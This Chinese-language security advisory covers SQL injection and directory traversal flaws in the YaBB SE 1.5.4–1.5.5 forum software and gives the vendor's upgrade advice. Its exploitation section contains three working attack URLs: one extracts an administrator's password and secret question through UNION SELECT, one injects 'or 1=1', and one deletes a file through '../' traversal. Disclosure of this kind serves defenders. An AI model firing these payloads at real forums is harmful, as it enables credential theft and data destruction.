YABB SE多个输入验证漏洞
2005-08-17
系统编号:
WAVDB-00438
BUGTRAQ: 9774
影响版本:
YaBB SE 1.5.4-SE 1.5.5 b
程序介绍:
YABB SE是一款基于PHP/MySQL的论坛程序。
漏洞分析:
YABB SE由于不正确的输入验证,远程攻击者可以利用这些漏洞进行SQL注入和目录遍历攻击。
SQL注入漏洞存在于ModifyMessage函数中,由于对$msg参数没有进行任何输入检查,因此可造成SQL注入攻击。造成敏感信息泄露和数据库信息删除。
目录遍历攻击是由于ModifyMessage函数没有对用户提交给$attachOld参数包含 ../ 字符的数据缺少过滤,攻击者可能以WEB进程权限查看系统任意文件内容。
漏洞利用:
http://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
http://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul
l,null,null,null,null,null,null,null,null/* HTTP/1.0
解决方案:
厂商补丁:
YaBB
----
用户必须升级到SMF 1.0 Public Beta 4,另外YaBB SE由于不在支持,供应商将不提供补丁:
http://www.simplemachines.org/download.php
信息来源:
<*来源:Alnitak
backspace (backspace_2k@terra.es)
*>